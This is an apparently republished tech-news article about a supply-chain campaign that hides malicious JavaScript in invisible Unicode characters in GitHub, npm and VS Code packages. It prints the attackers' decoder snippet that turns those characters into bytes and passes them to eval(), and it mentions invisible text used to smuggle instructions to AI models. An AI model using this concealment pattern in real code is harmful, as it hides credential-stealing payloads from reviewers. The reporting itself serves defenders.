Close Menu

    Subscribe to Updates

    Get the latest news from tastytech.

    What's Hot

    Volkswagen ID. Polo revealed, priced below Renault 5 E-Tech in Germany

    April 29, 2026

    The MIT-IBM Computing Research Lab launches to shape the future of AI and quantum computing | MIT News

    April 29, 2026

    A 48-team World Cup is Panini sticker collectors’ biggest challenge yet | World Cup 2026 News

    April 29, 2026
    Facebook X (Twitter) Instagram
    Facebook X (Twitter) Instagram
    tastytech.intastytech.in
    Subscribe
    • AI News & Trends
    • Tech News
    • AI Tools
    • Business & Startups
    • Guides & Tutorials
    • Tech Reviews
    • Automobiles
    • Gaming
    • movies
    tastytech.intastytech.in
    Home»Tech Reviews»Supply-chain attack using invisible code hits GitHub and other repositories
    Supply-chain attack using invisible code hits GitHub and other repositories
    Tech Reviews

    Supply-chain attack using invisible code hits GitHub and other repositories

    gvfx00@gmail.comBy gvfx00@gmail.comMarch 14, 2026No Comments3 Mins Read
    Share
    Facebook Twitter LinkedIn Pinterest Email



    The invisible code is rendered with Public Use Areas (sometimes called Public Use Access), which are ranges in the Unicode specification for special characters reserved for private use in defining emojis, flags, and other symbols. The code points represent every letter of the US alphabet when fed to computers, but their output is completely invisible to humans. People reviewing code or using static analysis tools see only whitespace or blank lines. To a JavaScript interpreter, the code points translate into executable code.

    The invisible Unicode characters were devised decades ago and then largely forgotten. That is, until 2024, when hackers began using the characters to conceal malicious prompts fed to AI engines. While the text was invisible to humans and text scanners, LLMs had little trouble reading them and following the malicious instructions they conveyed. AI engines have since devised guardrails that are designed to restrict usage of the characters, but such defenses are periodically overridden.

    Since then, the Unicode technique has been used in more traditional malware attacks. In one of the packages Aikido analyzed in Friday’s post, the attackers encoded a malicious payload using the invisible characters. Inspection of the code shows nothing. During the JavaScript runtime, however, a small decoder extracts the real bytes and passes them to the eval() function.

    const s = v => [...v].map(w => (
      w = w.codePointAt(0),
      w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
      w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
    )).filter(n => n !== null);
    
    
    eval(Buffer.from(s(``)).toString('utf-8'));

    “The backtick string passed to s() looks empty in every viewer, but it’s packed with invisible characters that, once decoded, produce a full malicious payload,” Aikido explained. “In past incidents, that decoded payload fetched and executed a second-stage script using Solana as a delivery channel, capable of stealing tokens, credentials, and secrets.”

    Since finding the new round of packages on GitHub, the researchers have found similar ones on npm and the VS Code marketplace. Aikido said the 151 packages detected are likely a small fraction spread across the campaign because many have been deleted since first being uploaded.

    The best way to protect against the scourge of supply-chain attacks is to carefully inspect packages and their dependencies before incorporating them into projects. This includes scrutinizing package names and searching for typos. If suspicions about LLM use are correct, malicious packages may increasingly appear to be legitimate, particularly when invisible unicode characters are encoding malicious payloads.

    Table of Contents

    Toggle
      • Related posts:
    • UniFi Drive, Explained: The App that Powers All Ubiquiti UNAS Servers
    • Dyson's latest vacuum cleaner empties itself, so you don't have to get your hands dirty
    • Best Internet Providers in Seattle, Washington

    Related posts:

    Windows 11 Upgrade on Upsupported Hardware: Free ISO Downloads for Version 25H2 and More

    Bluey at Disneyland: What to Know and What Else Is Coming to Disney Parks in 2026 and Beyond

    Samsung's new Android XR headset is coming October 21 and you can reserve one now

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleArc Raiders Replacing AI-Generated Voices With Human Actors
    Next Article Postgres vs MySQL vs SQLite: Comparing SQL Performance Across Engines
    gvfx00@gmail.com
    • Website

    Related Posts

    Tech Reviews

    Why a recent supply-chain attack singled out security firms Checkmarx and Bitwarden

    April 29, 2026
    Tech Reviews

    Texas Instruments made a new flagship graphing calculator: the TI-84 Evo

    April 29, 2026
    Tech Reviews

    Google Moves Forward With Pentagon AI Deal Despite Employee Pushback

    April 29, 2026
    Add A Comment
    Leave A Reply Cancel Reply

    Top Posts

    Black Swans in Artificial Intelligence — Dan Rose AI

    October 2, 2025139 Views

    We let ChatGPT judge impossible superhero debates — here’s how it ruled

    December 31, 202542 Views

    Every Clue That Tony Stark Was Always Doctor Doom

    October 20, 202525 Views
    Stay In Touch
    • Facebook
    • YouTube
    • TikTok
    • WhatsApp
    • Twitter
    • Instagram

    Subscribe to Updates

    Get the latest tech news from tastytech.

    About Us
    About Us

    TastyTech.in brings you the latest AI, tech news, cybersecurity tips, and gadget insights all in one place. Stay informed, stay secure, and stay ahead with us!

    Most Popular

    Black Swans in Artificial Intelligence — Dan Rose AI

    October 2, 2025139 Views

    We let ChatGPT judge impossible superhero debates — here’s how it ruled

    December 31, 202542 Views

    Every Clue That Tony Stark Was Always Doctor Doom

    October 20, 202525 Views

    Subscribe to Updates

    Get the latest news from tastytech.

    Facebook X (Twitter) Instagram Pinterest
    • Homepage
    • About Us
    • Contact Us
    • Privacy Policy
    © 2026 TastyTech. Designed by TastyTech.

    Type above and press Enter to search. Press Esc to cancel.

    Ad Blocker Enabled!
    Ad Blocker Enabled!
    Our website is made possible by displaying online advertisements to our visitors. Please support us by disabling your Ad Blocker.